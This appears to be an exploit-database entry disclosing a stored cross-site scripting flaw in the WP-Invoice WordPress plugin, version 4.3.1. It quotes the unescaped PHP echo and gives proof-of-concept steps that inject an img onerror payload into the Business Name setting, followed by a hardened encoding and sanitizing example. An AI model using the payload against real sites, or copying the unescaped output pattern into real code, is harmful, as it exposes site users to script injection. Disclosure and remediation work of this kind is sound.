## https://sploitus.com/exploit?id=PACKETSTORM:166824
# Exploit Title: WordPress Plugin WP-Invoice - Stored Cross Site Scripting  
# Date: 25-04-2022  
# Exploit Author: Mariam Tariq - HunterSherlock  
# Vendor Homepage: https://wordpress.org/plugins/WP-Invoice/  
# Version: 4.3.1  
# Tested on: Firefox  
# Contact me: mariamtariq404@gmail.com  
  
# Vulnerable Code:  
```  
wpi.business_name = '<?php echo ($wpi_settings['business_name']); ?>';  
```  
  
# POC  
1. Install the WP-Invoice WordPress plugin and activate it.  
2. Go to WP-Invoice settings and inside the Business Name field inject XSS payload “><img src=x onerror=alert(1)>  
3. XSS will trigger and will be stored.  
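
A hardened counterpart to the line quoted under Vulnerable Code, as an added example that is not part of the advisory or the plugin's own code: it emits the setting as an encoded JavaScript string literal and cleans the value before it is stored. `$wpi_settings` here is a constructed stand-in array, and `render_unescaped`, `render_encoded` and `sanitize_business_name` are hypothetical helper names.

```php
<?php
// Added example (not WP-Invoice code). $wpi_settings is a constructed stand-in
// for the plugin's settings array; the helper names below are hypothetical.

// The pattern quoted in the advisory: raw value echoed inside a JS string literal.
function render_unescaped(array $wpi_settings): string
{
    return "wpi.business_name = '" . $wpi_settings['business_name'] . "';";
}

// Hardened form: emit a JSON string literal. The JSON_HEX_* flags turn <, >, &,
// ' and " into \uXXXX escapes, so the value cannot close the string or the
// surrounding <script> element. json_encode() supplies the quotes itself.
function render_encoded(array $wpi_settings): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    $literal = json_encode((string) $wpi_settings['business_name'], $flags);
    if ($literal === false) {
        $literal = '""'; // unencodable input (e.g. invalid UTF-8): emit an empty string
    }
    return 'wpi.business_name = ' . $literal . ';';
}

// Input-side check for a single-line name field: drop tags and control characters.
function sanitize_business_name(string $raw): string
{
    $clean = strip_tags($raw);
    $clean = (string) preg_replace('/[\x00-\x1F\x7F]+/', ' ', $clean);
    return trim($clean);
}

// Constructed sample values; the second is the payload from the PoC steps above.
$samples = [
    "Bob's Invoices",
    '"><img src=x onerror=alert(1)>',
];

foreach ($samples as $name) {
    $settings = ['business_name' => $name];
    echo "input     : ", $name, PHP_EOL;
    echo "unescaped : ", render_unescaped($settings), PHP_EOL;
    echo "encoded   : ", render_encoded($settings), PHP_EOL;
    echo "sanitized : ", sanitize_business_name($name), PHP_EOL, PHP_EOL;
}
```

Inside WordPress, `wp_json_encode()` and `sanitize_text_field()` are the core functions that cover the output and input sides respectively.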
  
## POC Image  
  
https://imgur.com/rsHIEO9